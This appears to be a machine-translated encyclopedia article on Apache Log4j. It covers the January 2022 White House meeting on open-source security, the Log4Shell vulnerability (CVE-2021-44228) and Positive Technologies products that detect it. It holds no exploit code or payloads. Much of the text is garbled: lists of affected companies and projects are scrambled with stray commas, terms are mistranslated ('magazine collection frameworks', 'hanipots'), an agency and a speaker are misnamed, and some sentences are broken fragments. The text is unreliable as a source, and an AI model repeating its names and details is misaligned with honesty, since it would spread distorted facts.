Apache Log4j

Main article: Data management

2022: US White House brings together Microsoft, Google and IBM after detecting a critical vulnerability in Apache software

On January 13, 2022, the administration of US President Joe Biden held a meeting with the heads of large technology companies, federal agencies and non-profit organizations to discuss the problem of open source software security. The need for a conversation between representatives of IT-Business, key members of the Open Source community and the government is ripe after the discovery of a sensational vulnerability in the Apache Log4j library, which caused a huge wave of attacks on servers around the world.

The event at the White House took place in a video conference format. It took place not as a presentation, but as a panel discussion in which each of the participants could speak. The discussion was attended by representatives of Amazon, IBM, Microsoft, Akamai, Apache Software Foundation and Linux Foundation, as well as the US ministries of trade, defense, energy and national security. The meeting was led by Anne Neuberger, chief adviser to the US White House on cyber technology.

Security experts are sounding the alarm about a new critical vulnerability found in the widespread Apache Log4j library

According to The Wall Street Journal, the meeting participants said that they focused on practical ways of working together in the public and private sectors to increase open source security standards, partly relying on the efforts of the community, including the development of the Open Source Security Foundation (OpenSSF, founded in 2020). The latter includes large banks, IT companies and research organizations.

We believe that further work requires cooperation between companies and organizations that use and supply open source software, "the Apache Software Foundation said after a conversation organized by the US presidential administration.

Several participants in the meeting also made statements in which they welcomed the White House's support for the issue of open source security, but warned of the lack of security of such products.

It is difficult to imagine a situation in which the government would take a very negative position and say: "Well, we cannot trust open source software" or consider Open Source as a scapegoat, "said technical director Robert Bloomof Akamai, who attended the meeting.

He said that the participants in the conversation discussed finding ways to support open software in such a way as not to overload developers, but to actually support them using various tools, educational and other initiatives.

Google proposed creating a kind of marketplace to select volunteers in companies developing the most important projects for the market that most need support. Google itself expressed its readiness to provide resources for such work.

Casey Ellis, founder and technical director of Bugcrowd (developing a platform for white hackers), says that small Open Source projects are often supported by small groups of volunteers who work on them from time to time. This poses a great threat to the safety of such products, she said.

Representatives of IT companies and US federal agencies discussed the problem of open source security

At the same time, the participants in the landmark meeting did not agree on any concrete steps aimed at solving the problem of open source software security. However, the White House intends to put forward concrete proposals in the coming days, as well as prepare a plan for the next meeting on this issue with the heads of large IT companies, it was reported on January 14, 2022.

On January 11, 2022, the Cybersecurity and Infrastructure Protection Agency (CISA) announced that it had not yet discovered serious destructive cyber attacks related to Log4j vulnerabilities, but recognized its seriousness.

The scale and potential impact of this problem make it incredibly serious, "CISA head Jen Easterly said in a conversation with reporters, adding that the problem with Log4j has become the" most serious vulnerability "that she has had to see in her entire career.[1]

2021: Detect a vulnerability that allows you to remotely execute arbitrary code without authentication

The Vulnerability Management System, MaxPatrol VM Deep Traffic Analysis PT Network Attack Discovery firewall , and Web Application Layer PT Application Firewall System identify a critical zero-day vulnerability in the Apache Log4j Log Library that uses millions of applications and services based on, Java enterprise software , and cloudy servers. computer games This was reported Positive Technologies on December 14, 2021. Since December 10, 2021, attackers have been actively scanning the network in search of vulnerable systems and hanipots. attack

In one of the most popular magazine collection frameworks in the world - the Log4j library of the developer Apache Software Foundation - a zero-day vulnerability was discovered. All versions of the library from 2.0-beta9 to 2.14.1 are subject to it. The vulnerability, called Log4Shell, allows attackers to remotely execute arbitrary code without authentication and seize full control over vulnerable servers.

CVE-2021-44228 has a maximum CVSS 3.0 hazard level of 10. Log4Shell is distinguished by ease of operation: the operation to send one line of code to the log through the application does not require special technical skills from attackers.

The Log4j library is part of most Apache network products, and is also used in millions of enterprise applications and web services developed in Java to record error messages. According to the latter, to data cloud,, servers Amazon,, Apple,, Baidu,, Cloudflare DiDi Google JD.com Microsoft Minecraft, NetEase, Steam,,,,, and thousands Tencent Tesla Twitter VMware of other software vendors are exposed to vulnerabilities. In addition, the framework is actively used in various open source projects, including,, and. Elasticsearch Ghidra Red Hat

Starting December 10, 2021, attempts to mass scan the network for vulnerable systems for Log4Shell are recorded. The risk of its operation increased significantly after the first PoC exploit was published on the GitHub portal. According to Positive Technologies experts, in real attacks, this vulnerability in Apache Log4j can be exploited in many ways, depending on the specific service. As a result, large organizations around the world, government websites, as well as most of the Internet are at risk.

Positive Technologies products will help detect cyber threats: three of them detect the Log4Shell vulnerability "out of the box," that is, current users do not need to download anything additionally. In particular, if the knowledge base MaxPatrol VM contains updates dated December 10, 2021, vulnerable assets will be identified automatically.

The PT Application Firewall (version 3.0) detects an attempt to exploit the vulnerability as SSTI (embedding malicious code in a server-side template) and subsequently blocks it, and version 4.0 additionally defines it as an attempt at JNDI injection.

Log4Shell operation can also be detected using PT NAD during network traffic analysis. To do this, experts from the Positive Technologies expert security center added a special detection rule to the product.

Triggering a rule in PT NAD when attempting to exploit a vulnerability in the Log4j library